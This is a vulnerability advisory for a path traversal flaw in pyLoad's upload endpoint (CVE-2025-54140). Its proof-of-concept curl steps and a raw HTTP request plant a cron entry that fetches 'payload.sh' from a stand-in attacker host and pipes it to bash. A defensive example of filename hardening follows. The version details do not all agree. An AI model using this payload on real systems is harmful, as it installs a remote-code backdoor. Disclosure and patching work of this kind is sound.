CVE-2025-54140
Severity: HIGH 7.5 | EPSS 1.6%

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write
Description
## Summary

An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` web UI. By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory and **write arbitrary files to any location** on the system that is writable by the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**

---

### Vulnerable Code

File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)

```python
@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        # file.filename is taken verbatim from the multipart Content-Disposition header
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)
```

**Issue**: No sanitization or validation of `file.filename`, so `../` sequences in the client-supplied name are joined straight into the destination path.

### Proof of Concept

**Setup, option A: clone and install pyLoad from source**

```bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
```

**Setup, option B: install via pip (PyPI) in a virtualenv**

```bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
```

1. **Log in and obtain a session cookie**

```bash
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
```

2. **Create a malicious cron payload**

```bash
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
```

3. **Upload the file with a path-traversal filename**

```bash
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
```

4. On the next cron tick the payload runs. Note that this particular target requires the pyLoad process to be able to write into `/etc/cron.d`, i.e. to run as root; with a less privileged process the write lands only where that user has permission, which still covers every file the pyLoad account owns.
### Burp Suite HTTP Request

```
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```
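The following is an added example, not pyLoad's code and not part of the advisory. It parses the multipart body of the request above with the standard-library `email` parser to recover the `filename` parameter exactly as the server's framework would, shows what the advisory's unchecked `os.path.join(dir_path, "tmp_" + file.filename)` turns it into, and places a hardened join beside it that rejects any filename carrying a directory component and then re-checks containment of the built path. The storage root `/var/lib/pyload` is an assumed stand-in for the configured `storage_folder`; the request body is constructed from the Burp request shown on this page. `posixpath` is used instead of `os.path` so the demonstration behaves the same on every host.

```python
"""Added example (not pyLoad's code): filename extraction from a multipart
upload, the advisory's unchecked join, and a hardened replacement.

Assumed values: STORAGE_ROOT stands in for pyLoad's storage_folder setting;
the "tmp_" prefix is the one from the advisory's snippet.
"""
import email
import posixpath

STORAGE_ROOT = "/var/lib/pyload"          # assumed storage_folder value
BOUNDARY = "-" * 24 + "d74496d66958873e"  # boundary from the request above

# Constructed sample: the PoC request body, CRLF-terminated as on the wire.
POC_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; '
    'filename="../../../../etc/cron.d/pyload_backdoor"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "*/1 * * * * root curl http://attacker.com/payload.sh | bash\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()


def upload_filenames(boundary: str, body: bytes) -> list[str]:
    """Parse a multipart/form-data body and return every filename parameter.

    The stdlib email parser handles the multipart framing and header
    parameters, so the filename comes out exactly as the client sent it.
    """
    raw = f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n".encode() + body
    msg = email.message_from_bytes(raw)
    return [part.get_filename() for part in msg.walk() if part.get_filename()]


def vulnerable_dest(storage_root: str, filename: str) -> str:
    """The join from the advisory's snippet: the client controls every byte after tmp_."""
    return posixpath.join(storage_root, "tmp_" + filename)


def escapes_root(storage_root: str, dest: str) -> bool:
    """Lexically normalise dest and report whether it lies outside storage_root."""
    root = posixpath.normpath(storage_root)
    return posixpath.commonpath([root, posixpath.normpath(dest)]) != root


def safe_dest(storage_root: str, filename: str) -> str:
    """Hardened join: refuse a filename with a separator, NUL or dot-name,
    then verify containment of the built path as defence in depth."""
    name = filename.replace("\\", "/")        # clients may send backslashes
    if (posixpath.basename(name) != name       # contains a directory component
            or name in ("", ".", "..")
            or "\x00" in name):
        raise ValueError(f"rejected upload filename: {filename!r}")
    dest = posixpath.join(storage_root, "tmp_" + name)
    if escapes_root(storage_root, dest):
        raise ValueError(f"rejected upload filename: {filename!r}")
    return dest


def is_rejected(storage_root: str, filename: str) -> bool:
    """True when safe_dest refuses the filename (convenience for exercising the check)."""
    try:
        safe_dest(storage_root, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for fn in upload_filenames(BOUNDARY, POC_BODY):
        dest = vulnerable_dest(STORAGE_ROOT, fn)
        print(f"{fn!r} -> {dest}  escapes root: {escapes_root(STORAGE_ROOT, dest)}")
        print("hardened:", "rejected" if is_rejected(STORAGE_ROOT, fn) else safe_dest(STORAGE_ROOT, fn))
```

Two things worth noticing when running this. First, the containment check here is lexical; a production version should resolve the storage root with `os.path.realpath` before comparing, otherwise a symlink inside the storage folder can point the write elsewhere. Second, because of the `tmp_` prefix the first path component of the PoC destination is the literal directory name `tmp_..`: `normpath` folds it away, but the kernel only walks through it if a directory of that name exists, so the set of reachable targets depends on what already sits in the storage folder and on how many `../` the attacker sends.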
Affected packages (1)
- PyPI/pyload-ng >= 0.5.0b3.dev89, < 0.5.0b3.dev90
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH 7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
References (5)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2025-54140
- PATCH: https://github.com/pyload/pyload
- WEB: https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109
- WEB: https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0
- WEB: https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg